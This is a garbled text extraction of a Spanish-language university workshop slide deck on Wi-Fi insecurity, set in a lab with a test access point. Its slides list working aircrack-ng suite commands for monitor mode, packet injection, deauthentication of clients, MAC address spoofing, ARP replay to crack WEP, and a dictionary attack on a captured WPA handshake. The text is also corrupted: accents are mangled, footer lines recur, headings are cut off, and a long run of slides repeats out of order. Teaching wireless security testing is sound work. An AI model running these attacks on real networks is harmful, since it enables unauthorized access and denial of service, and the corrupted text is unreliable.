bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
